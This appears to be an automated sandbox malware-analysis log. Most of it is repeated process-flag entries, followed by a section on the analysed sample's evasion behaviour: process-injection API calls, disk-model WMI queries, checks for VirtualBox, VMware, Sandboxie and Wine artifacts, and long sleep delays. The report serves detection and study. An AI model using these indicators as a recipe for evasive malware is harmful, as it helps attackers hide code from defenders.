Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,38_2_0000000140001868
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxMiniRdrDN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6365Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3527Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6194
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 527
Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 419Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 417Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6569
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3067
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3567
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2428
Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 423
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 645
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 582
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 554
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 523
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 511
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 497
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 439
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 492
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 461
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 459
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 472
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 461
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 454
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 457
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 447
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 449
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 444
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 445
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_38-15502
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_38-15806
Source: C:\Windows\System32\cmd.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_17-18405
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_38-15506
Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_38-15597
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2324Thread sleep count: 6365 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep count: 3527 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep count: 6194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1924Thread sleep count: 527 > 30
